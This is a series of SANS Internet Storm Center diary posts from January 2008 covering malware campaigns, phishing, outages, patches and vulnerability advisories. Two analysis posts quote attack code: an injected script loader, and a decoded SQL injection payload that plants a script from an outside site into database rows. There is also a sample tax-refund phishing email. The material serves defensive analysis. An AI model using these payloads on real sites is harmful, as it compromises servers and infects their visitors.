Published: 2008-01-31

Storm Worm coming to an end?

According to this article over at internetnews.com, apparently American and Russian Law Enforcement know who created the Storm Worm.   The Storm Worm, which has plagued our email spam boxes for at least the past 3 or 4 holidays (US), and continues to be a nuisance, because of it's mutational ability.  Hopefully it's a short matter of time before this goes away.

(Of course only to be reborn in another form.)

We'll see.  In the meantime, take a look at the above article.

Joel Esler



Published: 2008-01-31

AT&T Wireless Data Outage

Thanks all of you that have written in.  We have seen the articles that say that AT&T is having a wireless data outage. 

We have heard from multiple sources on the issue, and it seems to be limited to only certain regions of the US.  (Central and South East primarily).  I am currently in the NE section of the country, writing this entry on my AT&T 3G Wireless card.  So I know it's working here (plus my iPhone and my wife's Blackberry work fine too).

We have also heard that this problem has been resolved.  So everything should be back (if not already) to normal soon.

Thank you for writing in all of you.

Joel Esler



Published: 2008-01-30

MS08-001 PoC exploit demonstrated

Yesterday Immunity Inc. published a flash movie demonstrating compromise of a WinXPSP2 system using an exploit they've developed for the IGMPv3 vuln that was announced by Microsoft earlier this month.

You can see the video here: http://immunityinc.com/documentation/ms08_001.html

And read a ComputerWorld article about it here: http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9060118




Published: 2008-01-30

Decreased/non-existant connectivity to the Middle-East

There are a number of sties reporting that the undersea cable that connected Italy and Egypt has been cut, resulting in a fairly complete outage of Internet connectivity in many parts of the Middle-East.

Additional details here: http://www.theregister.co.uk/2008/01/30/india_mideast_lose_internet/


See http://www.renesys.com/blog/2008/01/mediterranean_cable_break.shtml for additional technical information.



Published: 2008-01-29

Insignia Photo Frame Malware Request

We have had several reports of malware/viruses infecting some photo frames purchased around the holidays from Best Buy, Target and Walmart.  We are asking anyone who has a copy the programs to upload them to our contact page so that we can review the  programs and  provide them to the Anti-Virus vendors.  We are hoping to get comparisons of the different malware found to determine if there is a correlation between frames and manufacturers. Upload them to:




Published: 2008-01-29

Yet another Tax Scam

Consumers Beware....  Tax Scam's via email, online and by telephone are ramping up, especially with the prospect of receiving the "rebate" from the Fed's.  A report from Kansas City Missouri indicates that the crooks are returning to the age old telephone in order to attempt to scam consumers.  The FBI have reported that at least 4 people have been contacted.  Once again, just a reminder.... Use extreme care to not fall victim to these crooks.



Published: 2008-01-28

'Tis the Season for Tax Return Scams

It's that time of the year again, tax season.  With every tax season is the latest in tax return phishes.  Below is a sample that started hitting the wires a bit ago, but standard click-and-get-0wned.  (This one pointed to a website that was down by the time I found it).  In this case, the phish also pointed into residential DSL space.  If someone out there can happen to snag the malware this thing tries to get, I copy would be apprciated (I'm assuming they change the link in the email routinely).



Tax Notification
Internal Revenue Service (IRS)

United States Department of the Treasury

Date:  01/28/2008

After the last annual calculations of your fiscal

activity we have determined that you are eligible

to receive a tax refund of $134.80.

Please submit the tax refund request and allow us

6-9 days in order to process it.

A refund can be delayed for a variety of reasons.

For example submitting invalid records or applying

after the deadline.

To access the form for your tax refund, click here (BAD LINK HERE).


Internal Revenue Service

Document Reference: (92054568).

John Bambenek, bambenek /at/ gmail [dot] com



Published: 2008-01-28

Happy Data Privacy Day

The International Association of Privacy Professionals (IAPP) has made today Data Privacy Day.  Among other things, they encourage giving either of two presentations in local settings, "Privacy Today" on ways to protect your information and "Teen Privacy Online" that focuses on the use of social networking tools and risks that come with them.

The important note about this effort is that it focuses its attention on the weakest area of privacy protect, the individual themselves.  If people do not protect their own information (for instance, by putting their entire lives in their facebook profile) there is little other groups can do to prevent the misuse of that information.

John Bambenek, bambenek /at/ gmail [dot] com


Published: 2008-01-27

Digital Hitchhikers Part Four

If you recall, we started this thread on Christmas day with a short story about an infected digital photo frame purchased at a Sam's Club.  We were contacted by the Wal-Mart's security team (Sam's Club is owned by Wal-Mart) a few days later.  They were aware of the problem as a result of reading our diary but could not replicate it with any frames they tested.  We also contacted the distributer of the frames (Advanced Design Systems) and they could not duplicate the problem either.   Since that original story we published an update on January 4th asking if anybody had seen similar problems with any device recently purchased that used a USB connection to communicate with a host computer.  That led to a second update on January 7th that contained more details about other devices that were infected.  Since then, more devices have been reported to the Internet Storm Center as being infected with malware and there have been a few media reports.

Of interest is a report this past week saying that Best Buy pulled thousands of digital photo frames from their shelves based on the presence of malware.  The supplier of the frames, Insignia, posted the technical information on their web site.  One of our readers observed that the photo frames purchased at Sam's Club have remote controls remarkably similar to the ones sold at Best Buy.  Check it out yourself:

Best Buy's frame and remote, distributed by Insignia.



Sam's Club's remote, distributed by Advanced Design Systems

The remotes are not exactly the same but the similarities are striking.  This led our reader to ponder whether there are more commonalities in these devices.  He suggested that looking at the two motherboards might offer clues.  So if anybody has both the ADS and the Insignia frames in their possession and don't mind cracking them open...

Here is what we know so far:

  • Five digital photo frames from Advanced Design System were bought at various Sam's Clubs containing malware.
  • Best Buy pulled from the shelves several thousand digital photo frames from Insignia that contained malware.
  • Our readers reported more malware found on other devices such as
    • a set of MP3 playing sunglasses (store where sold is not known)
    • a 250GB Maxtor External One Touch Backup from Radio Shack
    • a "Flip Video Camera" from a California Costco
    • a MemoryVue 1040 Plus digital photo frame from Digital Spectrum Incorporated that was purchased at a Canadian Costco
    • an 8-inch Castleton digital photo frame from Uniek that was purchased at a Target
    • a Maxtor One Touch 250GB external hard drive purchased at Fry's Electronics

We do not think that these situations are related but they do paint a picture of a new attack vector, the supply chain.  By the supply chain, we mean this process:

Factory -> Shipping -> Distributer -> Shipping -> Warehouse -> Shipping -> Retail Store -> Customer

Several readers have submitted ideas about how these devices got infected:

  • The user's computer was already infected but the user did not know it
  • The device was infected by a customer then returned to the store where it was repackaged and resold
  • A store employee infected the device as a prank
  • A customer infected the device as a prank
  • The retail store is not "clean" but checked returned electronics items with an infected computer, thus spreading malware from one returned product to another
  • The distributer or the warehouse infected the device
  • One or more of the shipping companies infected the device
  • It was infected at the factory

Whatever the cause, there seems to be some sort of breakdown in the security of the supply chain.  It's easy for retailers to blame the consumers but when the same malware shows up on products purchased at retail stores hundreds of miles apart by different customers it raises serious questions about the true source of the malware.

A final thought.  Many readers are aware of the penetration tests done about two years ago with USB memory sticks that were sprinkled around a victim site to see if employees would bring them in then plug them into corporate computers.  Knowing what you know now about this attack vector, how many digital photo frames are floating around your office that have already been plugged into your corporate computers?

More information about disabling the Autoplay function of Microsoft Windows is available at Microsoft's Technet site.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-01-26

On a slow day, an interesting read

I just finished reading an article and several blogs about some interesting web infections.  Without rehashing the stories, we are looking for any readers who have first hand experience with this, particularly the binaries for us to look at.

For further reading




Published: 2008-01-25

So.. Are all of the bad guys really on the outside?

Today Fox News reported that a 41 year Jacksonville, FL women who thinking that she was about to be replaced, deleted 7 years of drawings, blueprints and other files from her employers server. Estimated damage $2.5 million. The company owner said that they managed to recover the files by using an expensive data recovery service.


Today USAToday reported that a cable company accidentally deleted the inboxes, archives and files for about 14,000 of their customers.  They said that it was a software glitch, “That's because, a spokeswoman says, the company set out to delete inactive e-mail accounts, but ended up destroying thousands of active ones, too.”


As I read both of these stories I have to ask myself, “Where were the backups?” In the first story, they had 7 years worth of data, as they indicate $2.5 million worth, why on earth would they not have a backup?  What if it had been a drive failure that took out the drive instead of an employee purposely taking it out?  What would they have done then? And in the case of the cable company, even if you don’t routinely backup the mail boxes, when doing maintenance such as this one, best practice is, “BACK IT UP”.  When doing any type of maintenance my experience says “Murphy’s Law Prevails”. 

A little while ago I got a phone call from a friend of mine. They own a small business and have one computer in the shop that contains all of their customer records, financials, and receivables. I setup a backup for them and it was set to run every night after the shop closed. She called and said that when she turned the computer on this morning it won’t load Windows, it says “insert system disk”. I explained to her that it sounded like the hard drive had failed, that we would have to replace the hard drive and then restore from the last backup.  She said “well, that may be a problem”. I asked her why and her reply was “well, we needed some space on the computer table to layout some papers, so I unhooked the backup drive and forgot to plug it back in.  Guess what, she wants to know if I can help get the data back…. 

So, all three of these “loss of data” situations were caused by insider errors.  One accidental, one on purpose and one…. Well, let’s not go there…

Another situation that popped up in the last couple of weeks was also caused by an insider.  Not on purpose but none the less it happened. I monitor the IP addresses that we “own” for any suspicious activity in an attempt to prevent us from getting blocklisted.  I noticed on both of the web sites that I check that one IP address was doing a lot of mailing.  I knew that this IP address belonged to a local financial institution and I knew that they did not have a mail server at that IP address. I contacted the admin for the site and told him to take a look at his firewall logs and see if he saw anything unusual. He called me back a short time later and said that there definitely was something going on and he was going to track down the offending machine and give me a call back.  About an hour later he indeed did call and tell me that he had found the problem. Someone from the outside had brought in a laptop and plugged it into their network.  Now this was not intended to be malicious, the admin knew that the laptop was to be plugged in and he really didn’t think that there would be a problem because…. Are you ready for it…. It was the company that was hired to come in and Audit the financial institutions records. You got it an; auditor had a compromised computer. He said that the auditor commented to him when they told him what his laptop was doing “Geez, you know that explains it, I thought this thing was awfully slow lately”.

Therefore, I again say “The bad guys aren’t always on the outside”.


Thanks to one of our reader's Dan Jones I am updating the diary with a link to an incredible piece of wisdom. 




Published: 2008-01-24

MS08-001 updated

Microsoft updated MS08-001 to include Small Business Server 2003 SP2 as vulnerable. They also added to the FAQ to clarify that the MS Detection and Deployment tools will detect this and correctly patch it.




Published: 2008-01-24

Drive-by Pharming and attacks against network infrastructure

Symantec posted a blog entry about attackers using vulnerabilities in web browsers (CSRF and XSS from our interpretation of the article) to reconfigure home routers/firewalls to change their DNS  servers to enable MITM attacks. They report having seen a number of delivery methods for the attacks including email, and compromised or malicious websites.

The full article is here: http://www.symantec.com/enterprise/security_response/weblog/2008/01/driveby_pharming_in_the_wild.html

Heise.de also has an article about the issue (links to the Symantec post) for those of you who prefer reading german: http://www.heise.de/newsticker/meldung/102281

There are a number of moderately effective mitigations that you can use to prevent this (per Symantec)-

  • change your default password on the router
  • turn off UPnP if you don't have an explicit, serious need for it
  • try using one of the less common RFC 1918 address range

And of course make sure that you are using up to date AV and firewall and IDS and everything else on your internal systems.

One of my fellow handlers pointed out that the most interesting and significant part of this issue is that it marks a change in targeting by attackers. The move from compromising the end-host to targeting the home routers & firewalls (or other infrastructure) has ugly implications about the way we are currently defending our systems.  Ideally a man in the middle attack should always be noticeable, but we all know that people tend to click "accept" way too quickly most of the time.


Published: 2008-01-23

Two New Cisco Vulnerabilities

Cisco released two advisories today, one for a risk of leaving a root account without a password in the Cisco Application Velocity System (AVS) and one for a potential DoS (forced reload) of the PIX 500 series and the Adaptive Security Appliance (ASA) for the Cisco 5500 series.

The AVS prior to version 5.1.0 doesn't prompt users to modify the system password during initial config, which potentially leaves you with a privileged account without a password. The CVS ID for this is CVE-2008-0029 and full details can be found here:


The PIX and ASA are vulnerable to a specifically created packet when they have the TTL decrement feature enabled. The CVS ID for this is CVE-2008-0028 and full details can be found here:



Published: 2008-01-22

Happy Birthday Mozilla!

Mozilla is 10 years old today.  Ah, it was just 10 years ago? (Thanks for writing in Kevin) Where are we now?

Well, depending on what statistics and what country you look at for those statistics, the Firefox browser has about a 16-28% market share.  Not bad considering the amount of browsers that are out there! 

Normally here I would ask for the readers to submit in your favorite Firefox plugins (one of the best features of the browser), but the emails would number in the thousands.  So I'm not going to do that.  Let's just all thank Mozilla for the wonderful browser and market they have created.  I've always said diversity is key.  It's great that I have been to hundreds of organizations and I can honestly say that each one has had Firefox installed.  Maybe not the default browser, but at least had it installed.

Anyway.  It's been a fast 10 years.

Joel Esler



Published: 2008-01-22

It's a slow day at the ISC offices

We haven't had much email from the readers today.  Half the US has the day off for Martin Luther King Jr day.  Hopefully tomorrow, when everyone gets back to work and discovers something to write into us about, we can article it up.  Even the tech news is slow today.  So, in light of the holiday here, we'll take the rest of the day off and be back tomorrow.


Joel Esler



Published: 2008-01-21

Exploiting the admin process

Today has been a rather slow day at the Internet Storm Center.  Perhaps some folks in the US actually got Martin Luther King, Jr. Day off from work (or maybe not).  We got e-mail from Jim and Gordon though that got me thinking.  Jim e-mailed to report what he thought were (and may well be) spoofed referrer strings showing up in his weblogs.  His concern was that some of these referrers might host malware, so an admin who was diligently monitoring their logs, might get infected when trying to follow-up on how users found their website.  Gordon reported some unexpected behavior from Kiwi Syslog Daemon which was being used to collect logs from a Sonicwall setup.  He noted that the firewall was showing outbound NetBIOS attempts to China (fortunately being blocked by the firewall) from the Windows machine collecting the logs.  It turns out that the Kiwi Syslog Daemon that he was using was attempting to lookup the names (reverse lookups) of the machines that were hitting the firewall first by DNS and then by NetBIOS (a feature that can apparently be disabled in v 8.3.6 BETA).  Again, this brought to mind the possibility that a responsible admin monitoring logs as they ought to, could have that very diligence used against them.  I recall some time back an attack where folks were targeting, I think, one of the Apache log analyzers by crafting some of the data that gets logged (exact details escape me a the moment, I'll update the story with a link if I remember the details).  I'm not aware of this class of attacks being used widely these days, but I figured since it was slow, I'd ask our readers if they have seen any other attacks like this that actually target the diligent admin and what types of defenses do you (or should you) take to protect against them?  The handlers kicked around a few thoughts among ourselves today and I'll include them with reader response in a followup story.


Published: 2008-01-20

Not so boring night....

Last night an outage occured at the backbone level,. causing an outage on the popular Massive Multi-player Online Role Playing Game (MMORPG) World of Warcraft.  It looks as if things have returned to normal now.  The interesting thing here is that, even on a Saturday night/Sunday morning, the internet is still as heavily used, or almost as heavily used, as during the day.  Gone are the days where, on a weekend night, a major provider can take a 4-hour stint for some downtime maintenance.  Looking at the report from the past 4 hours, we can see that there were still some slow spots in the country.


Published: 2008-01-19

Industrial Control System Attacks

At the recent SANS SCADA Summit in New Orleans a CIA spokesman gave the audience these chilling comments:

"We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands. We suspect, but cannot confirm, that some of these attackers had the benefit of inside knowledge. We have information that cyber attacks have been used to disrupt power equipment in several regions outside the United States. In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."

More information on the event is available in the current SANS NewsBites.

Here at the Internet Storm Center we rarely hear about intrusions into the PCS/SCADA community (Process Control Systems / Supervisory Control And Data Acquisition.)  If you are an industrial control system asset owner and are willing to share information about cyber attacks you have witnessed, please do so via our contact page.  We will maintain your privacy and anonymity if you desire, but please provide enough detail so that other readers and asset owners can understand the nature of the incident you experienced.  We'll publish a summary in a future diary.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-01-18

More about mass web infections

Couple of days ago Mari posted a diary (http://isc.sans.org/diary.html?storyid=3834) about mass web infections; other sources like the Register reported about the same thing.

I’ve been playing with one compromised web site today and was trying to figure out what the infection vector is.

Some general information first. On all compromised sites the bad guys installed a server side script. This script embeds a script tag pointing to another JavaScript file on the same server, hosting various exploits. This script is randomly generated. The compromised server also caches the IP address of the client so subsequent requests for the same page from the same IP address will not contain the script tag to the malicious JavaScript file. So, the first visit to a compromised web site will include the link:

<script language='JavaScript' type='text/javascript' src='egmjh.js'></script>

<div id="page">

While subsequent visits will not:

<div id="page">

The JavaScript file has some trivial obfuscation, what’s interesting is that they created a generic part which handles the final URL that will be used to download the malware from:

var arg="mvdrzjyh";
var MU = "http://" +document.location.hostname + "/" + arg;

var MU2 = "\"" + MU + "\"";

The MU2 variable is then inserted in the exploit code (which is split using the escape() calls). This makes the exploit code “universal” – it works on every compromised server and the server side script only has to set the arg parameter (the name of the final binary that gets pulled and executed on a vulnerable client) as the hostname will be set automatically by the browser. The rest is simple (and has been written about by others so I won’t spend time on that) – the script tries to exploit multiple vulnerabilities and if successful will result in the binary executed on the system.

Another interesting thing is that the binary seems to be repacked on the compromised system as well. I pulled couple of binaries from different clients and every time received a different sample (and AV detection was pretty poor).

Two main questions are still not answered here: how do those servers get initially compromised and what kind of server side application do the bad guys install?

There has been a lot of speculation about server side stuff. Some sources claim that compromised servers are running a rootkit and an evil Apache module that does this JavaScript injection and random file generation on the fly.

So a call for samples/logs/packets – if you have access to one of the compromised servers we would appreciate any information that can help resolving this.





Published: 2008-01-18

Issues with X11 and Citrix

Remote vulnerabilities for two graphical user environments have been announced, four for an environment which has been around since the beginning of distributed computing, and one with a newer contender.

iDefense have released four vulnerabilities for various vendor implementations of the popular X11 implementations. 

Multiple Vendor X Server XInput Extension Multiple Memory Corruption Vulnerabilities (CVE-2007-6427)
Multiple Vendor X Server TOG-CUP Extension Information Disclosure Vulnerability (CVE-2007-6428)
Multiple Vendor X Server EVI and MIT-SHM Extensions Integer Overflow Vulnerabilities (CVE-2007-6429)
Multiple Vendor X Server XFree86-Misc Extension Invalid Array Index Vulnerability (CVE-2007-5760)

ZDI have released the following remotely exploitable vulnerability for the following products:

  • Metaframe Presentation Server 3.0
  • Presentation Server 4.0, 4.5
  • Access Essentials 1.0, 1.5, 2.0
  • Desktop Server 1.0

This vulnerability does not require previous authentication for Citrix.

Citrix Presentation Server IMA Service Heap Overflow Vulnerability (ZDI-08-002)



Published: 2008-01-17

Large scale recovery

Scott emailed an interesting question the other day which I’m going to flick pass to you all. 

We all have workstations in our organisations.  They run AV products, encryption software, FW, management tools etc, a nice mix of products that we use to protect and manage workstations.  And they all play nice right?

Well what if they don’t?  For example, what if there is a nasty conflict between products, a patch messes one or more of the products up, a virus runs wild, or even something as simple as a group policy screws up.   But the fix, rather than a swift click on a button, means you have to go to each machine, boot it into safe mode, make a change, then reboot.  How do you recover your workstation environment? 

Now the answer is relatively simple if there are only a few machines involved, you might send junior on the road to fix all the machines, one by one.  It will keep him out of your hair for a bit.  But what if there are 100, 1000 or even 10,000+ machines to fix?  Even junior will need a white coat after a while. 

So here is a little scenario for you all to have a think about.   The company has 8000 workstations at several locations, some behind relatively slow lines.   A nasty little virus has slipped through and 4,000 machines have been infected.   Automated cleanups do not work and the only choice left is to manually inspect and clean the machine or reimage.  Luckily head office has nice clean images for all the hardware deployed.   

So what can we do?  Are local recovery partitions on workstations the go? Imaging servers, maybe one at each remote location? Bootable imaging DVDs, deployment products, packaging products?  Should we change the environment, use thin clients, PXE??

What do you do?  Send us your ideas on how you already cope or would cope with having to do a large scale recovery of workstations.   I’ll collate the responses and you never know your idea may save someone’s junior from wearing a white coat.



Published: 2008-01-17

Shorts - other things happening this week.

There have been a few interesting things over the last few days that are worth a mention.  We’ll start with malware.

We’ve had some reports of a new round of Dept of Justice messages (thanks Steve).  You know the one:“A complaint has been filled against the company you are affiliated to ....” .  This particular text variation was first reported in early December, but seems to have received a new lease of life and a nice new payload to go along with it.  It was detected by only 4/32 on virustotal (should be close to 32/32 by now).  The other thing was that it was well targeted.  The name was correct as was the company name.  So someone has a good quality list.  The attachment was called PDF_Complaint.scr, luckily most of us already drop this extension at the gateway.

Another oldie, but goodie (the original goes back to 2006) was provided by Johan, who received a SPIM.   The message was along the lines of:  “Hi, my name is <name>.  I am studying in <country>.  I’m looking for a friend/partner ...etc”.   The link to the photos of the young lady takes you to Russia and provides you with a little extra code.   A file called ntos.exe is created and the registry is then modified replacing winlogin.exe with the new file.   You are now providing information to those that will use it for you.

We also received a report on SMS phishing.  A SMS is sent “Dear <insert bank name> customer, we are informing you that your online services have expired and needs to be renewed.  Please visit us at ...URL...”.   At the URL in the message a “special” surprise awaits.

So keep an eye on those mobiles.  Keep blocking those files that should never be emailed and patch.  A Significant portion of the malware we see, all exploit relatively old exploits.   Why?  Because they still work.





Published: 2008-01-16

Deja Vu: Valentine's Storm

Yesterday we started receiving another wave of Storm e-mails, this time exploiting our love: you got it, Storm started exploiting Valentine’s Day. It looked like they missed the ball for Christmas but now they are certainly back.

The e-mails Storm is sending are same as in last couple of waves – a subject designed to catch your attention and the body with a URL consisting of only an IP address (in other words, it should be easy to detect this with anti-spam tools).

Once a user visits the web site he is served with a nice web page (see below) and a link to download an executable – same as with previous versions.

Valentine Storm

So is there anything new about this variant of Storm? Not really. The social engineering attack is the same as before. Actually, there are a lot of similarities with Storm’s Valentine’s attack last year (2007). The subjects are almost the same and the only difference is that last year Storm sent itself as an attachment.

Storm’s packing/obfuscation techniques are still up to the task – when I downloaded the first variant only 4 anti-virus programs out of 32 on VirusTotal properly detected it with virtually no coverage amongst the most popular anti-virus programs. These results are not completely correct since some AV programs are able to block Storm when the user tries to execute it, due to behavior analysis. That being said, it still shows that the server side packing/obfuscation Storm uses works.

Following the pattern we can probably expect Super Bowl being exploited soon as well.




Published: 2008-01-16

New MS Excel vulnerability could allow remote code execution

Microsoft has just released an advisory and blog entry on a newly discovered vulnerability in MS Excel products. The vulnerability is, according to the blog, already actively exploited by targeted attacks.  Excel 2003SP3 and Excel 2007 are not affected, but most other versions are.


Published: 2008-01-15

Apple releases QuickTime 7.4 with security fixes

Apple has just released QuickTime 7.4 which fixes several security vulnerabilities:

  • CVE-2008-0031: A maliciously crafted Sorensen 3 movie file may lead to arbitrary code execution;
  • CVE-2008-0032: A maliciously crafted movie file may lead to arbitrary code execution during the handling of Macintosh resource records;
  • CVE-2008-0033: A maliciously crafted movie file may lead to arbitrary code execution during parsing of Image Descriptor atoms;
  • CVE-2008-0036: A maliciously crafted PICT image may lead to arbitrary code execution;

Note that this update does not yet appear to resolve the critical vulnerability reported last week by Luigi Auriemma (VU #112179).


Published: 2008-01-15

Oracle releases January 2008 Critical Patch Update

The January 2008 Critical Patch Update contains 27 security fixes, of which the highest CVSS score is 6.8 for servers and 9.3 for Application Server clients. The following Oracle versions are affected by vulnerabilities fixed in this patch release:

Oracle Database 11g, version
Oracle Database 10g Release 2, versions,
Oracle Database 10g, version
Oracle Database 9i Release 2, versions,
Oracle Application Server 10g Release 3 (10.1.3), versions,,,
Oracle Application Server 10g Release 2 (10.1.2), versions -,,
Oracle Application Server 10g (9.0.4), version
Oracle Collaboration Suite 10g, version 10.1.2
Oracle E-Business Suite Release 12, versions 12.0.0 - 12.0.3
Oracle E-Business Suite Release 11i, versions 11.5.9 - 11.5.10 CU2
Oracle Enterprise Manager Grid Control 10g Release 1, versions,
Oracle PeopleSoft Enterprise PeopleTools versions 8.22, 8.47, 8.48, 8.49
Oracle PeopleSoft Enterprise Human Capital Management versions 8.9, 9.0 (Absence Management Module)

More information and downloads at Oracle.


Published: 2008-01-15

Flash UPNP attack vector

GNUcitizen has issued a blog posting regarding a new method of exploiting UPNP-enabled devices - by having a user access a malicious SWF file. The group was able to identify how Flash can be used to generate an URLRequest to a UPNP control point, allowing an external party to reconfigure that device.

One limiting factor is that the IP address of the router needs to be known, but on most end user networks this is trivial: these machines are within well known private ranges and are generally at the .1 or .254 end of the spectrum. With further review and information pending, we suggest evaluating (as with any piece of functionality) whether there is a legitimate need to have UPNP enabled on affected devices. Some guidance from the US-CERT can be found here.


Published: 2008-01-15

Targeted attacks: behind the media reports

Between Christmas and New Year, I spoke at the Chaos Communications Congress in Berlin on targeted attacks. Some basic findings included:

  • Office applications are the most common targets, but utilities such as archivers that are seldom updated by the user are also commonly exploited;
  • Control servers used in the attack are generally compromised boxes themselves. The connection occurs based on a DNS lookup, not an IP address. This allows the attackers to reuse an infected machine even when the original control server is cleaned by its owners. These control servers sometimes contain port forwarders connecting to another machine, often in a different jurisdiction;
  • Initially, attacks were disabled and enabled remotely by "parking" the control hostname to localhost ( As this is a bit obvious, newer code contains checks for specific, fake IP addresses upon which the attack is temporarily disabled. Parking addresses are generally easy to spot manually, such as;
  • Hostnames are reused over several months but appear to be target-specific, while compromised IP addresses are potentially shared between targets;
  • "Memes", such as funny documents that are distributed on mailing lists, are sometimes redistributed by attackers, but containing malicious code. Users are familiar with the document being sent to them and are likely to open it.

A number of people approached me afterwards telling me that most of what they learned about the issue so far came from the media, not from their peers. When I started studying the phenomenon, my approach was to contact groups that had reported very similar attacks, such as the Falun Gong community. Information and samples from these groups allowed me to gain a better understanding of the attacks. 

Targeted attacks evolve based on economies built around the information that is targeted. When information is valuable to the attacker, he will take commensurate effort to compromise it. Depending on the value, this encourages the use of novel, untested techniques. Such techniques tend to be unreliable and fail disproportionately. Failures can be detected, understood and shared. This type of sharing is part of what I refer to as security intelligence.

If you’re worried about this type of compromise, join one of the many information sharing mechanisms your industry may offer: the United States has a fair amount of ISACs (Information Sharing and Analysis Centers), and the UK offers its WARPs (Warning, Advice and Reporting Points). These organizations allow you to share information and still rest assured it is anonymized appropriately.

We are also very interested in hearing about your experiences. The Storm Center takes your confidentiality very seriously, so please do identify what we can post and what should remain private or should only refer to as generic techniques. We appreciate your contribution.

You can download the CCC presentation here or read up on the issue further here.

Maarten Van Horenbeeck


Published: 2008-01-14

Mass Web Infections

One of our readers, Peter, asked us to post a Register article for comments.


It would appear that two different web infections are moving around the Internet.   One is about 15% of ScanSafe's traffic, the other only 1%.  The 15% represents e-commerce websites hosting the infections and passing them on to visitors.

The 1% traffic is significantly more interesting as it appears to be intelligent enough to produce a randomly generated file name each time the person visits the site.  It is this fluxing which is causing so much discomfort with Incident Handlers worldwide.

If you have any info regarding these mass infections.  Please let us know here.

Fair Winds,

Mari Nichols


Published: 2008-01-12

Patchlink Issue

One of our readers has sent us an issue with Patchlink on his Windows servers.

Some of the services on a server stop responding, although it is still be to reach via ping and remote desktop. The server would always have a 5719 error with a "Not enough storage" description. 

After much troubleshooting, he discovered that the issue is caused by the gravitix executable, which is part of the Patchlink client, was consuming ~15,000 TCP handles.

The reader found from the support site that this is indeed an issue (Answer ID 525):
"Agents/computers may go offline after extended periods without PatchLink Update Service being restarted; handle count exceeds 12,000 on gravitixservice.exe."

Unfortunately, the extended period is unclear since the server has been rebooted less than a month ago.

Thanks to our reader for sharing this. If you face similar issue and running Patchlink on your servers, you may want to check this out first. Do drop us a note if this is a real case to you.


We have been informed that an official fix for this has now been released. QFE agent/client package version 253 will apparently fix this issue.


Published: 2008-01-12

Sun Java SE 6 Update 4 has released

Sun Java SE 6 Update 4 has released. From the release notes, it has more than 370 bug fixes.

For end users, you may want to update your Java JRE v1.6.0_04 soon.



Published: 2008-01-11

Java.ByteVerify exploit

Come April, we will reach the FIFTH anniversary of the ByteVerify vulnerability (MS03-011). Untangling some seriously obfuscated JavaScript coming from a couple of web sites in China earlier today, I ended up with - yes, a ByteVerify exploit. Also in the package was an MDAC exploit (MS06-014), whose second anniversary will be up this April as well.

To see these exploits still in use can only mean one thing: They still work.

And they seem to work well enough that the bad guys can instead sink their time into developing new obfuscation techniques and other ways to make analysis more difficult -- only to deliver a five year old exploit in the end. Not a very stellar testament to patching efforts.



Published: 2008-01-09

Mass exploits with SQL Injection

Couple of days ago fellow handler Scott wrote a diary about sites hosting exploits for various Realplayer vulnerabilities. One of the malicious sites mentioned in the article, uc8010.com looked particulary interesting. When you search for this web site in Google you get thousands of other, compromised sites that are all pointing to the uc8010.com web site. This, obviously, sparked some interest in the security community so we decided to dig a bit further into this attack.

It turned out that there is an automated script or a bot exploiting SQL injection attacks in vulnerable web applications. I remembered that I saw the very same attack appearing back in November last year but it was not this wide spread – it appears that the attacker improved the crawling/attacking function of his bot so he managed to compromise more web sites.

The attack back from November 2007 was almost exactly the same as the current one, but the SQL statement appears to be a bit improved. One of the logs that we received back in November is shown below:

GET /home/site_content_3.asp


As you can see, we can't tell much what's going on here. The attackers were smart and decided to obfuscate the attack by using the CAST statement. The CAST statement explicitly converts one data type to another. So, the attackers CAST the big input value as "@S" and then execute it. In this example, the site_content_3.asp script is vulnerable to SQL injection (notice the ' character after s=290, which is an input parameter for the site_content_3.asp script).

Back to the CAST statement. We can decode this simply with perl, we just need to copy the CAST content into a separate line and do something like this:

$ perl -pe 's/(..)00/chr(hex($1))/ge' < input > output

The output file will contain the decoded SQL statement:

declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'
from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);

And here we can see exactly what's going on. This SQL statement takes all rows from the sysobjects table with type U (user table). It then cycles through those objects and matches those that with type „varchar“. Finally, for every such object it executes an update statement which results in appending the code shown above pointing to the yl18.net site.

The attack with the uc8010.com site was practically the same with a bit better SQL – Ryan Barnett posted an example of this attack at http://www.modsecurity.org/blog/

As some people noticed, almost all affected web sites are running IIS and MS SQL server. This makes sense since the SQL statement in the attack will work only on MS SQL servers and there aren't that many web sites running Apache on Windows. That being said, I have no doubt that the bad guys will expand their bot (if they haven't already) so it starts attacking PHP+MySQL web sites.

This is another example that points to issues with development of web applications (see the OWASP top ten vulnerability list for 2007 – injection flaws are on the second place http://www.owasp.org/index.php/Top_10_2007-A2#Protection). One could also protect against attacks such as this one with a reverse proxy/web application firewall in front of the web server. However, be aware that this is just a temporary fix – as we saw in this example the bad guys are pretty good in evading detection, as they did with the CAST statement (sure, you can block on CAST but be aware that there are other obfuscation ways).




Published: 2008-01-08

Master Boot Record rootkit

Matt Richard from Verisign sent us some information regarding the Master Boot Record (MBR) rookit that's been found in the wild in the past weeks.

The first interesting part is the timeline:

The next big thing is that those distributing this rootkit, also distribute the Torpig banking Trojan.

The rootkit is currently being installed through a set of relatively old, and easy to patch Microsoft vulnerabilities:

  • Microsoft JVM ByteVerify (MS03-011)
  • Microsoft MDAC (MS06-014) (two versions)
  • Microsoft Internet Explorer Vector Markup Language (MS06-055)
  • Microsoft XML CoreServices (MS06-071)

But that can change at any moment to something more recent.

The different files involved had rather spurious detection in the anti-virus world.

Swa Frantzen -- Gorilla Security


Published: 2008-01-08

January Black Tuesday overview

Overview of the January 2008 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS08-001 Multiple vulnerabilities in the TCP/IP stack lead to arbitrary code execution and denial of service.
Replaces MS06-032
TCP/IP stack

KB 941644 No publicly known exploits Critical Critical Critical
MS08-002 Input validation errors in Local Security Authority Subsystem Service (LSASS) lead to local exploitation and privilege escalation.

KB 943485 No publicly known exploits Important Important Important


We will update issues on this page as they evolve.
